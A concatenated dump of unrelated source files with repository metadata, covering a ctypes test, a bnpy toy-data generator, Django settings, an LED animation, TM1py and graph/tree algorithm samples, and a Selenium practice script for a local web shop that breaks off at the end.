self.response.write('<p>The time is: %s</p>' % str(datetime.datetime.now()))
app = webapp2.WSGIApplication([('/', MainPage)], debug=True)
|
[
"[email protected]"
] | |
5797591605f22b2b07de9070a65a6a233fa70ace
|
38dc3ab929bcc9845a88ce1e210cec1025c1d962
|
/src/learntocut/libs/cwrapping/__init__.py
|
2f27ff9fcff5cd481ab67286e02128e459bd6354
|
[] |
no_license
|
suysh-msra/OResearch
|
c58403b46a028b9a1be9ed9d4b47fa8bb152fefb
|
ef51c9871b8222c26b62e22d3ed550a0d069c11d
|
refs/heads/master
| 2023-03-22T09:08:38.929830 | 2021-03-15T14:47:04 | 2021-03-15T14:47:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 108 |
py
|
#try:
# import gurobicpy
#except:
# from . import gurobicpy
#from rlip.envs.cwrapping import gurobicpy
|
[
"[email protected]"
] | |
edf57439c76d8c1b3d592074a699e34cfd4a5ac4
|
acd41dc7e684eb2e58b6bef2b3e86950b8064945
|
/res/packages/scripts/scripts/common/Lib/ctypes/test/test_cfuncs.py
|
1dd0e756e4abd4e16f874e05426342163b9b7036
|
[] |
no_license
|
webiumsk/WoT-0.9.18.0
|
e07acd08b33bfe7c73c910f5cb2a054a58a9beea
|
89979c1ad547f1a1bbb2189f5ee3b10685e9a216
|
refs/heads/master
| 2021-01-20T09:37:10.323406 | 2017-05-04T13:51:43 | 2017-05-04T13:51:43 | 90,268,530 | 0 | 0 | null | null | null | null |
WINDOWS-1250
|
Python
| false | false | 7,850 |
py
|
# 2017.05.04 15:31:23 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/ctypes/test/test_cfuncs.py
import unittest
from ctypes import *
import _ctypes_test
class CFunctions(unittest.TestCase):
_dll = CDLL(_ctypes_test.__file__)
def S(self):
return c_longlong.in_dll(self._dll, 'last_tf_arg_s').value
def U(self):
return c_ulonglong.in_dll(self._dll, 'last_tf_arg_u').value
def test_byte(self):
self._dll.tf_b.restype = c_byte
self._dll.tf_b.argtypes = (c_byte,)
self.assertEqual(self._dll.tf_b(-126), -42)
self.assertEqual(self.S(), -126)
def test_byte_plus(self):
self._dll.tf_bb.restype = c_byte
self._dll.tf_bb.argtypes = (c_byte, c_byte)
self.assertEqual(self._dll.tf_bb(0, -126), -42)
self.assertEqual(self.S(), -126)
def test_ubyte(self):
self._dll.tf_B.restype = c_ubyte
self._dll.tf_B.argtypes = (c_ubyte,)
self.assertEqual(self._dll.tf_B(255), 85)
self.assertEqual(self.U(), 255)
def test_ubyte_plus(self):
self._dll.tf_bB.restype = c_ubyte
self._dll.tf_bB.argtypes = (c_byte, c_ubyte)
self.assertEqual(self._dll.tf_bB(0, 255), 85)
self.assertEqual(self.U(), 255)
def test_short(self):
self._dll.tf_h.restype = c_short
self._dll.tf_h.argtypes = (c_short,)
self.assertEqual(self._dll.tf_h(-32766), -10922)
self.assertEqual(self.S(), -32766)
def test_short_plus(self):
self._dll.tf_bh.restype = c_short
self._dll.tf_bh.argtypes = (c_byte, c_short)
self.assertEqual(self._dll.tf_bh(0, -32766), -10922)
self.assertEqual(self.S(), -32766)
def test_ushort(self):
self._dll.tf_H.restype = c_ushort
self._dll.tf_H.argtypes = (c_ushort,)
self.assertEqual(self._dll.tf_H(65535), 21845)
self.assertEqual(self.U(), 65535)
def test_ushort_plus(self):
self._dll.tf_bH.restype = c_ushort
self._dll.tf_bH.argtypes = (c_byte, c_ushort)
self.assertEqual(self._dll.tf_bH(0, 65535), 21845)
self.assertEqual(self.U(), 65535)
def test_int(self):
self._dll.tf_i.restype = c_int
self._dll.tf_i.argtypes = (c_int,)
self.assertEqual(self._dll.tf_i(-2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_int_plus(self):
self._dll.tf_bi.restype = c_int
self._dll.tf_bi.argtypes = (c_byte, c_int)
self.assertEqual(self._dll.tf_bi(0, -2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_uint(self):
self._dll.tf_I.restype = c_uint
self._dll.tf_I.argtypes = (c_uint,)
self.assertEqual(self._dll.tf_I(4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_uint_plus(self):
self._dll.tf_bI.restype = c_uint
self._dll.tf_bI.argtypes = (c_byte, c_uint)
self.assertEqual(self._dll.tf_bI(0, 4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_long(self):
self._dll.tf_l.restype = c_long
self._dll.tf_l.argtypes = (c_long,)
self.assertEqual(self._dll.tf_l(-2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_long_plus(self):
self._dll.tf_bl.restype = c_long
self._dll.tf_bl.argtypes = (c_byte, c_long)
self.assertEqual(self._dll.tf_bl(0, -2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_ulong(self):
self._dll.tf_L.restype = c_ulong
self._dll.tf_L.argtypes = (c_ulong,)
self.assertEqual(self._dll.tf_L(4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_ulong_plus(self):
self._dll.tf_bL.restype = c_ulong
self._dll.tf_bL.argtypes = (c_char, c_ulong)
self.assertEqual(self._dll.tf_bL(' ', 4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_longlong(self):
self._dll.tf_q.restype = c_longlong
self._dll.tf_q.argtypes = (c_longlong,)
self.assertEqual(self._dll.tf_q(-9223372036854775806L), -3074457345618258602L)
self.assertEqual(self.S(), -9223372036854775806L)
def test_longlong_plus(self):
self._dll.tf_bq.restype = c_longlong
self._dll.tf_bq.argtypes = (c_byte, c_longlong)
self.assertEqual(self._dll.tf_bq(0, -9223372036854775806L), -3074457345618258602L)
self.assertEqual(self.S(), -9223372036854775806L)
def test_ulonglong(self):
self._dll.tf_Q.restype = c_ulonglong
self._dll.tf_Q.argtypes = (c_ulonglong,)
self.assertEqual(self._dll.tf_Q(18446744073709551615L), 6148914691236517205L)
self.assertEqual(self.U(), 18446744073709551615L)
def test_ulonglong_plus(self):
self._dll.tf_bQ.restype = c_ulonglong
self._dll.tf_bQ.argtypes = (c_byte, c_ulonglong)
self.assertEqual(self._dll.tf_bQ(0, 18446744073709551615L), 6148914691236517205L)
self.assertEqual(self.U(), 18446744073709551615L)
def test_float(self):
self._dll.tf_f.restype = c_float
self._dll.tf_f.argtypes = (c_float,)
self.assertEqual(self._dll.tf_f(-42.0), -14.0)
self.assertEqual(self.S(), -42)
def test_float_plus(self):
self._dll.tf_bf.restype = c_float
self._dll.tf_bf.argtypes = (c_byte, c_float)
self.assertEqual(self._dll.tf_bf(0, -42.0), -14.0)
self.assertEqual(self.S(), -42)
def test_double(self):
self._dll.tf_d.restype = c_double
self._dll.tf_d.argtypes = (c_double,)
self.assertEqual(self._dll.tf_d(42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_double_plus(self):
self._dll.tf_bd.restype = c_double
self._dll.tf_bd.argtypes = (c_byte, c_double)
self.assertEqual(self._dll.tf_bd(0, 42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_longdouble(self):
self._dll.tf_D.restype = c_longdouble
self._dll.tf_D.argtypes = (c_longdouble,)
self.assertEqual(self._dll.tf_D(42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_longdouble_plus(self):
self._dll.tf_bD.restype = c_longdouble
self._dll.tf_bD.argtypes = (c_byte, c_longdouble)
self.assertEqual(self._dll.tf_bD(0, 42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_callwithresult(self):
def process_result(result):
return result * 2
self._dll.tf_i.restype = process_result
self._dll.tf_i.argtypes = (c_int,)
self.assertEqual(self._dll.tf_i(42), 28)
self.assertEqual(self.S(), 42)
self.assertEqual(self._dll.tf_i(-42), -28)
self.assertEqual(self.S(), -42)
def test_void(self):
self._dll.tv_i.restype = None
self._dll.tv_i.argtypes = (c_int,)
self.assertEqual(self._dll.tv_i(42), None)
self.assertEqual(self.S(), 42)
self.assertEqual(self._dll.tv_i(-42), None)
self.assertEqual(self.S(), -42)
return
try:
WinDLL
except NameError:
pass
else:
class stdcall_dll(WinDLL):
def __getattr__(self, name):
if name[:2] == '__' and name[-2:] == '__':
raise AttributeError(name)
func = self._FuncPtr(('s_' + name, self))
setattr(self, name, func)
return func
class stdcallCFunctions(CFunctions):
_dll = stdcall_dll(_ctypes_test.__file__)
if __name__ == '__main__':
unittest.main()
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\common\Lib\ctypes\test\test_cfuncs.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:31:23 Střední Evropa (letní čas)
|
[
"[email protected]"
] | |
4bf4f653d1613c7c86df9e27f28d4e409cace30d
|
5006a6965c21e5b828300eedf907eb55ec5b8b27
|
/bnpy/datasets/zzz_unsupported/SeqOfBinBars9x9.py
|
27e0894613c7097a982c3c7cb0276837370c30f6
|
[
"BSD-3-Clause"
] |
permissive
|
birlrobotics/bnpy
|
1804d0fed9c3db4c270f4cd6616b30323326f1ec
|
8f297d8f3e4a56088d7755134c329f63a550be9e
|
refs/heads/master
| 2021-07-09T14:36:31.203450 | 2018-02-09T07:16:41 | 2018-02-09T07:16:41 | 96,383,050 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,831 |
py
|
'''
SeqOfBinBars9x9.py
Binary toy bars data, with a 9x9 grid,
so each observation is a vector of size 81.
There are K=20 true topics
* one common background topic (with prob of 0.05 for all pixels)
* one rare foreground topic (with prob of 0.90 for all pixels)
* 18 bar topics, one for each row/col of the grid.
The basic idea is that the background topic is by far most common.
It takes over 50% of all timesteps.
The horizontal bars and the vertical bars form coherent groups,
where we transition between each bar (1-9) in a standard step-by-step way.
The rare foreground topic simulates the rare "artificial" phenomena
reported by some authors, of unusual all-marks-on bursts in chr data.
'''
import os
import sys
import scipy.io
import numpy as np
from bnpy.data import GroupXData
from bnpy.util import as1D
K = 20 # Number of topics
D = 81 # Vocabulary Size
bgStateID = 18
fgStateID = 19
Defaults = dict()
Defaults['nDocTotal'] = 50
Defaults['T'] = 10000
Defaults['bgProb'] = 0.05
Defaults['fgProb'] = 0.90
Defaults['seed'] = 8675309
Defaults['maxTConsec'] = Defaults['T'] / 5.0
def get_data(**kwargs):
''' Create dataset as bnpy DataObj object.
'''
Data = generateDataset(**kwargs)
Data.name = 'SeqOfBinBars9x9'
Data.summary = 'Binary Bar Sequences with %d true topics.' % (K)
return Data
def makePi(stickyProb=0.95, extraStickyProb=0.9999,
**kwargs):
''' Make phi matrix that defines probability of each pixel.
'''
pi = np.zeros((K, K))
# Horizontal bars
for k in xrange(9):
pi[k, k] = stickyProb
if k == 8:
pi[k, bgStateID] = 1 - stickyProb
else:
pi[k, (k + 1) % 9] = 1 - stickyProb
# Vertical bars
for k in xrange(9, 18):
pi[k, k] = stickyProb
if k == 17:
pi[k, bgStateID] = 1 - stickyProb
else:
pi[k, 9 + (k + 1) % 9] = 1 - stickyProb
pi[bgStateID, :] = 0.0
pi[bgStateID, bgStateID] = extraStickyProb
pi[bgStateID, 0] = 5.0 / 12 * (1 - extraStickyProb)
pi[bgStateID, 9] = 5.0 / 12 * (1 - extraStickyProb)
pi[bgStateID, fgStateID] = 2.0 / 12 * (1 - extraStickyProb)
mstickyProb = 0.5 * (stickyProb + extraStickyProb)
pi[fgStateID, :] = 0.0
pi[fgStateID, fgStateID] = mstickyProb
pi[fgStateID, bgStateID] = 1 - mstickyProb
assert np.allclose(1.0, np.sum(pi, 1))
return pi
def makePhi(fgProb=0.75, bgProb=0.05, **kwargs):
''' Make phi matrix that defines probability of each pixel.
'''
phi = bgProb * np.ones((K, np.sqrt(D), np.sqrt(D)))
for k in xrange(18):
if k < 9:
rowID = k
# Horizontal bars
phi[k, rowID, :] = fgProb
else:
colID = k - 9
phi[k, :, colID] = fgProb
phi[-2, :, :] = bgProb
phi[-1, :, :] = fgProb
phi = np.reshape(phi, (K, D))
return phi
def generateDataset(**kwargs):
for key in Defaults:
if key not in kwargs:
kwargs[key] = Defaults[key]
phi = makePhi(**kwargs)
transPi = makePi(**kwargs)
PRNG = np.random.RandomState(kwargs['seed'])
nSeq = kwargs['nDocTotal']
T_in = kwargs['T']
if isinstance(T_in, str):
Tvals = [int(T) for T in T_in.split(',')]
else:
Tvals = [T_in]
if len(Tvals) == 1:
seqLens = Tvals[0] * np.ones(nSeq, dtype=np.int32)
elif len(Tvals) < nSeq:
seqLens = np.tile(Tvals, nSeq)[:nSeq]
elif len(Tvals) >= nSeq:
seqLens = np.asarray(Tvals, dtype=np.int32)[:nSeq]
doc_range = np.hstack([0, np.cumsum(seqLens)])
N = doc_range[-1]
allX = np.zeros((N, D))
allZ = np.zeros(N, dtype=np.int32)
startStates = [bgStateID, fgStateID]
states0toKm1 = np.arange(K)
# Each iteration generates one time-series/sequence
# with starting state deterministically rotating among all states
for i in xrange(nSeq):
start = doc_range[i]
stop = doc_range[i + 1]
T = stop - start
Z = np.zeros(T, dtype=np.int32)
X = np.zeros((T, D))
nConsec = 0
Z[0] = startStates[i % len(startStates)]
X[0] = PRNG.rand(D) < phi[Z[0]]
for t in xrange(1, T):
if nConsec > kwargs['maxTConsec']:
# Force transition if we've gone on too long
transPi_t = transPi[Z[t - 1]].copy()
transPi_t[Z[t - 1]] = 0
transPi_t /= transPi_t.sum()
else:
transPi_t = transPi[Z[t - 1]]
Z[t] = PRNG.choice(states0toKm1, p=transPi_t)
X[t] = PRNG.rand(D) < phi[Z[t]]
if Z[t] == Z[t - 1]:
nConsec += 1
else:
nConsec = 0
allZ[start:stop] = Z
allX[start:stop] = X
TrueParams = dict()
TrueParams['beta'] = np.mean(transPi, axis=0)
TrueParams['phi'] = phi
TrueParams['Z'] = allZ
TrueParams['K'] = K
return GroupXData(allX, doc_range=doc_range, TrueParams=TrueParams)
DefaultOutputDir = os.path.join(
os.environ['XHMMROOT'], 'datasets', 'SeqOfBinBars9x9')
def saveDatasetToDisk(outputdir=DefaultOutputDir):
''' Save dataset to disk for scalable experiments.
'''
Data = get_data()
for k in xrange(K):
print 'N[%d] = %d' % (k, np.sum(Data.TrueParams['Z'] == k))
# Save it as batches
nDocPerBatch = 2
nBatch = Data.nDocTotal // nDocPerBatch
for batchID in xrange(nBatch):
mask = np.arange(batchID * nDocPerBatch, (batchID + 1) * nDocPerBatch)
Dbatch = Data.select_subset_by_mask(mask, doTrackTruth=1)
outmatpath = os.path.join(
outputdir,
'batches/batch%02d.mat' %
(batchID))
Dbatch.save_to_mat(outmatpath)
with open(os.path.join(outputdir, 'batches/Info.conf'), 'w') as f:
f.write('datasetName = SeqOfBinBars9x9\n')
f.write('nBatchTotal = %d\n' % (nBatch))
f.write('nDocTotal = %d\n' % (Data.nDocTotal))
Dsmall = Data.select_subset_by_mask([0, 1], doTrackTruth=1)
Dsmall.save_to_mat(os.path.join(outputdir, 'HMMdataset.mat'))
if __name__ == '__main__':
import scipy.io
import bnpy.viz.BernViz as BernViz
# saveDatasetToDisk()
# BernViz.plotCompsAsSquareImages(Data.TrueParams['phi'])
Data = get_data(nDocTotal=2)
pylab = BernViz.pylab
pylab.subplots(nrows=1, ncols=Data.nDoc)
for d in xrange(2):
start = Data.doc_range[d]
stop = Data.doc_range[d + 1]
pylab.subplot(1, Data.nDoc, d + 1)
Xim = Data.X[start:stop]
pylab.imshow(Xim,
interpolation='nearest', cmap='bone',
aspect=Xim.shape[1] / float(Xim.shape[0]),
)
pylab.ylim([np.minimum(stop - start, 5000), 0])
pylab.show(block=True)
|
[
"[email protected]"
] | |
8a51add4f7cac897e5689c2db9965056e5429db9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02684/s383863332.py
|
cee048d87cd74a0e9eb30d0721462d9b668e3bb4
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 620 |
py
|
N, K = map(int, input().split())
A = list(map(int, input().split()))
visited = [0 for _ in range(N)]
first_visit = [0 for _ in range(N)]
now = 0
flag = True
for i in range(10 ** 5 * 5):
if first_visit[now] == 0:
first_visit[now] = i
visited[A[now] - 1] += 1
now = A[now] - 1
if i == K - 1:
print(now + 1)
flag = False
break
if flag:
num = 0
for i in range(N):
if visited[i] > 2:
num += 1
for i in range(N):
if visited[i] >= 2:
if K % num == first_visit[i] % num:
print(i + 1)
break
|
[
"[email protected]"
] | |
b31f8616e5f36658a3e7687d1080014d2b0a7da7
|
0c39d88b4cdd35c96be02573f804196721d88f52
|
/mentha/tests/persistent_settings.py
|
818c47a931bc6c7a1b7dd1227006db39ec15c0fa
|
[
"MIT"
] |
permissive
|
ateoto/django-mentha
|
7909e5ad989481fa57aa3336bcb98380c6e9e762
|
2b9aeba1f9a33ee76dca2e1f9436e964be2c2325
|
refs/heads/master
| 2016-09-06T13:59:49.994441 | 2014-06-10T23:45:30 | 2014-06-10T23:45:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
from .test_settings import * # NOQA
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite',
}
}
|
[
"[email protected]"
] | |
16ea3f9021e49cc8cb94b0503223dd1a3ede9237
|
32a7a7663ce0c94dc7c6465e1a4b819145d17e87
|
/BiblioPixelAnimations/matrix/MathFunc.py
|
997fdced226c3f7c7b4c30d62bc9a1a0e66c1415
|
[
"MIT"
] |
permissive
|
CriticalTechGuy/BiblioPixelAnimations
|
04d08e1d41f374b63aa90956b3aeda2db6484d02
|
2a3a1671f289b21d7da316df1b5ca54d7f95a3b1
|
refs/heads/master
| 2020-03-26T06:24:12.460928 | 2018-04-19T10:17:21 | 2018-04-19T11:36:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,300 |
py
|
from bibliopixel.animation import BaseMatrixAnim
import bibliopixel.colors as colors
import random
import math
def hue_fade(a, b, val):
if a > b:
b = b + 360
return (a + ((b - a) * val)) % 360
class MathFunc(BaseMatrixAnim):
funcs = [
lambda x, y, s: x + (x * y) + s,
lambda x, y, s: x * s + (x * y),
lambda x, y, s: x * y * s + s,
lambda x, y, s: x * y - math.log(s + 1) + s,
lambda x, y, s: math.cos(0.5 * x) * y + s,
lambda x, y, s: math.cos(x * y) * y + s,
lambda x, y, s: math.tan(y) * math.cos(x) + s,
lambda x, y, s: math.sin(y) + x * s,
lambda x, y, s: math.sin(x) + y * s,
lambda x, y, s: math.sin(x * y) + y * x + s,
lambda x, y, s: x * x - y * y + s,
lambda x, y, s: (x * y - y * y) + s,
lambda x, y, s: (x * y - y * y) % (s + 1),
lambda x, y, s: (y * y + x * x) + s,
lambda x, y, s: x * y * 2 - y * y * 2 + s,
lambda x, y, s: (x / (y + 1)) + (y * y) + s,
lambda x, y, s: ((x * x) / 2 * (y + 1)) + s,
lambda x, y, s: x * y * (x + y) + s,
lambda x, y, s: x * y * (s / (x + 1)),
lambda x, y, s: (x * x * x) - (y * y * 2) + s,
lambda x, y, s: x * 12 - y * 4 + s,
lambda x, y, s: math.log10(x + 1) * (y * 2) + s
]
def __init__(self, layout, frames_per=300, func=0, rand=True, fade_frames=30):
super().__init__(layout)
self.start_func = func
self.frames_per = frames_per
self.rand = rand
self.fade_frames = fade_frames
self.fade_step = 1.0 / fade_frames if fade_frames else 0.0
def pre_run(self):
self._step = 0
self.count = 0
self.fade_count = 0
self.cur_func = random.choice(range(len(self.funcs))) if self.rand else self.start_func
self.next_func = None
def call_func(self, func, x, y, s):
return abs(int(self.funcs[func](x, y, s))) % 360
def step(self, amt=1):
self.layout.all_off()
for y in range(self.height):
for x in range(self.width):
h = self.call_func(self.cur_func, x, y, self._step)
if self.next_func:
h_next = self.call_func(self.next_func, x, y, self._step)
h = hue_fade(h, h_next, self.fade_step * self.fade_count)
c = colors.hue2rgb_360(h)
self.layout.set(x, y, c)
if self.next_func:
self.fade_count += 1
if self.fade_count >= self.fade_frames:
self.cur_func = self.next_func
self.next_func = None
self.fade_count = 0
self.count = 0
else:
self.count += 1
if not self.next_func and self.frames_per and self.count >= self.frames_per:
if self.rand:
self.next_func = random.choice(range(len(self.funcs)))
else:
self.next_func = self.cur_func + 1
if self.next_func >= len(self.funcs):
self.next_func = 0
self.state = 2
self.count = 0
if not self.fade_frames:
self.cur_func = self.next_func
self.next_func = None
self._step += amt
|
[
"[email protected]"
] | |
35b54fd11d79356160dff0313c1e493c06a17499
|
a373cdb4107e099ce31eaa0f7620292c6154d860
|
/Metadata/dim_hierarchy_get_default_member.py
|
50ba4c0431c1f79885b4e68a9fe079d3313bcfa3
|
[
"MIT"
] |
permissive
|
jamiros/tm1py-samples
|
2a562337baebc2dcbbefd76d64c4c8f20e98810a
|
a398ae8744dcf19b5aa045a87d878bf18c903cc6
|
refs/heads/master
| 2022-02-23T14:42:22.404148 | 2019-10-01T21:32:10 | 2019-10-01T21:33:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 696 |
py
|
"""
When a dimension of a cube is not explicitly referenced in an MDX Query,
TM1 will implicitly use the DefaultMember for the missing dimension.
If no DefaultMember is defined in TM1, it will use the element with index 1.
You can use TM1py to query and update the default member for a Hierarchy
"""
import configparser
from TM1py.Services import TM1Service
config = configparser.ConfigParser()
config.read(r'..\config.ini')
with TM1Service(**config['tm1srv02']) as tm1:
current_default_member = tm1.dimensions.hierarchies.get_default_member(
dimension_name="Date",
hierarchy_name="Date")
print("Current default member for dimension Date: " + current_default_member)
|
[
"[email protected]"
] | |
c6861e3d4dca9db411a177f6608f52cfa4d48142
|
aac418419c2ef4d10c5c4ceb607d3d8329a5f395
|
/Algorithms/Graph/Topological_Sorting.py
|
a67d9eb485275425187fa875ad930ae3a719ff68
|
[] |
no_license
|
sudhirshahu51/projects
|
bb13395227355ff84933b6d3a0f158ee42bcdceb
|
b2d8331d14d2163b20535368a60c81f6c8bc2c8f
|
refs/heads/master
| 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,342 |
py
|
# To implement Topological Sorting for directed graph
# Topological Sorting: if there is path from u to v then u comes before v in ordering
class Vertex: # Class of vertex
def __init__(self, key):
self.id = key
self.connected = {} # dictionary of all the connected vertices with tht vertice
self.in_degree = 0
self.status = 'tmp'
def add_neighbor(self, nbr, weight=0): # adding a adjacent neighbour where nbr is vertex
self.connected[nbr] = weight
def __str__(self):
return str(self.id) + 'connected to' + str([x.id for x in self.connected])
def get_connections(self): # Get all the adjacent vertices
return self.connected.keys()
def get_id(self):
return self.id
def get_weight(self, nbr):
return self.connected[nbr]
class Graph:
def __init__(self):
self.vertices_list = {}
self.vertices_num = 0
def add_vertex(self, key): # Add a vertex in the graph
self.vertices_num += 1
new_vertex = Vertex(key)
self.vertices_list[key] = new_vertex
return new_vertex
def get_vertex(self, key): # To return the vertex with the specified key
if key in self.vertices_list:
return self.vertices_list[key]
else:
return None
def __contains__(self, items): # Returns all the vertice by calling for i in g
return items in self.vertices_list
def add_edge(self, v1, v2, weight=1):
if v1 not in self.vertices_list:
self.add_vertex(v1)
if v2 not in self.vertices_list:
self.add_vertex(v2)
self.vertices_list[v1].add_neighbor(self.vertices_list[v2], weight)
g.get_vertex(v2).in_degree += 1
def get_vertices(self):
return self.vertices_list.keys()
def __iter__(self):
return iter(self.vertices_list.values())
class Queue:
def __init__(self):
self.items = []
def __contains__(self, item):
return item in self.items
def is_empty(self):
return self.items == []
def enqueue(self, data):
self.items.insert(0, data)
def de_queue(self):
return self.items.pop()
def size(self):
return len(self.items)
def front(self):
return self.items[-1]
def rare(self):
return self.items[0]
def topological(g):
if not isinstance(g, Graph):
return
q = Queue()
order = []
lst = list(g.vertices_list.keys())
while len(lst) != 0:
for x in lst:
if g.get_vertex(x).in_degree == 0:
q.enqueue(x)
lst.remove(x)
tmp = q.de_queue()
order.append(g.get_vertex(tmp))
for x in g.get_vertex(tmp).get_connections():
x.in_degree -= 1
return order
if __name__ == '__main__':
g = Graph()
for i in range(7):
g.add_vertex(i)
g.add_edge(0, 5)
g.add_edge(0, 1)
g.add_edge(1, 5)
g.add_edge(1, 4)
g.add_edge(2, 3)
g.add_edge(2, 1)
g.add_edge(3, 1)
g.add_edge(3, 4)
g.add_edge(4, 5)
g.add_edge(6, 5)
g.add_edge(6, 4)
print(topological(g))
|
[
"[email protected]"
] | |
af55e087aa75c1d2e0da2e2878b229a089ea5ed0
|
32ddd90c9f2b2037cb7fd0a338deefcf16e5d17d
|
/python/tree/sorted_array_to_bst.py
|
f060c74878b80931d55e37ccbd04bc5372c588a4
|
[] |
no_license
|
btoll/howto-algorithm
|
2a671779a4abb279e2a55461c8cfd7094770b42a
|
57ed65d97d951e3746f71190fb57813b519a1aa5
|
refs/heads/master
| 2023-02-20T17:17:38.600806 | 2023-02-10T05:16:22 | 2023-02-10T05:16:22 | 182,487,529 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 782 |
py
|
from random import randint
import ipdb
class TreeNode:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def sorted_array_to_bst(nodes, left, right):
if left > right:
return None
# Choose left middle node as a root.
mid = (left + right) // 2
# # If odd, add 1. Choose right middle node as a root.
# if (left + right) % 2:
# mid += 1
# Choose random middle node as a root.
# if (left + right) % 2:
# mid += randint(0, 1)
root = TreeNode(nodes[mid])
root.left = sorted_array_to_bst(nodes, left, mid - 1)
root.right = sorted_array_to_bst(nodes, mid + 1, right)
return root
nodes = [-10, -3, 0, 5, 9]
root = sorted_array_to_bst(nodes, 0, len(nodes) - 1)
|
[
"[email protected]"
] | |
4e08bf6ece5a6c2a9ade93b244d59c3220a2ce12
|
df3eb06af5151b0a07ebdf3723aedd3a6cd98f5e
|
/day3/dengLuTest.py
|
5e9494a4b3fd28ff603cf84b6c9ee04351872c1a
|
[] |
no_license
|
zhile0624/selenium7th
|
fa4d8e1a2bdeda18c0170de09144fc052ce71d32
|
6731ce2d786625ba0945739ec2c3109b04cd1441
|
refs/heads/master
| 2020-03-21T10:42:38.832843 | 2018-06-24T08:50:46 | 2018-06-24T08:50:46 | 138,466,713 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,375 |
py
|
# selenium执行javascript中的两个关键字: return(返回值) 和 arguments(参数)
import time
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
driver = webdriver.Chrome()
driver.get("http://localhost")
driver.implicitly_wait(20)
# 点击"登录"链接
# 用javascript的方法找登录链接的代码:
# document.getElementsByClassName("site-nav-right fr")[0].childNodes[1]
# 用selenium的方法找登录链接的代码:
# driver.find_element_by_link_text("登录")
# 通常,用selenium的方法找元素比javascript更容易
# 虽然selenium 不支持remoceAttribute的javascript方法
# 但是selenium找到登录链接和javascript找到的是同一个元素
# 我们可不可以把selenium找到的这个元素,传入到javascript方法里,代替原来的javascript定位
login_link = driver.find_element_by_link_text("登录")
# arguments参数的复数形式, [0]表示第一个参数,指的就是js后面的login_link
# 所以下面这句代码,相当于把driver.find_element_by_link_text("登录")带入到javascript语句中
# 变成了driver.find_element_by_link_text("登录").removeAttribute('target')
# arguments是参数数组,指的是js字符串后面的所有参数
# 一般情况下我们只会用到argument[0],即js后面的第一个字符串
driver.execute_script("arguments[0].removeAttribute('target')", login_link)
login_link.click()
# 执行成功的自己写登录
driver.find_element_by_id("username").send_keys("changcheng")
ActionChains(driver).send_keys(Keys.TAB).send_keys("123654").send_keys(Keys.ENTER).perform()
# 返回商城首页
driver.find_element_by_link_text("进入商城购物").click()
# 搜索iphone
driver.find_element_by_name("keyword").send_keys("iphone")
driver.find_element_by_name("keyword").submit()
# 点击商品(用这种方法,再实现一次不打开新窗口)
# 使用javascript删除a标签的target属性
# 因为img没有target属性,所以我们复制css的时候要找它的父节点a标签
# 复制出来的css往往比较长,我们可以适当的缩写长度
# 我们定位元素的目标节点是最后一个节点,
# 大于号>的前面是父节点,后面是子节点
# 每个节点的第一个单词是标签名,比a,div,body
# 小数点后面表示class属性
# :nth-child(2), nth表示第几个4th,5th,nth表示第n个, child表示子节点
# 所以.:nth-child(2)表示当前标签是它的父节点的第二个子节点
product_link_css = "div.protect_con > div:nth-child(2) > div.shop_01-imgbox > a"
# 通过xpath定位元素
iphone = driver.find_element_by_css_selector(product_link_css)
# 删除元素的target属性
driver.execute_script("arguments[0].removeAttribute('target')", iphone)
iphone.click()
# 在商品详情界面,点击加入购物车
driver.find_element_by_id("joinCarButton").click()
# driver.find_element_by_class_name("shopCar_T_span3").click()
driver.find_element_by_css_selector(".shopCar_T_span3").click()
# 点击结算按钮
# 在每个class前面都加一个小数点,并且去掉中间的空格, 我们就可以同时用两个属性定位一个元素
driver.find_element_by_css_selector(".shopCar_btn_03.fl").click()
# 点击添加新地址
driver.find_element_by_css_selector(".add-address").click()
# 输入收货人等信息(选择地区下午讲)
driver.find_element_by_name("address[address_name]").send_keys("张三")
driver.find_element_by_name("address[mobile]").send_keys("13123412345")
dropdown1 = driver.find_element_by_id("add-new-area-select")
# 下拉框是一种特殊的网页元素, 对下拉框的操作和普通网页元素不太一样
# Selenium为这种特殊的元素,专门创建了一个类Select
# dropdown1的类型是一个普通的网页元素, 下面这句代码的意思是,
# 把一个普通的网页元素,转换成一个下拉框的特殊网页元素
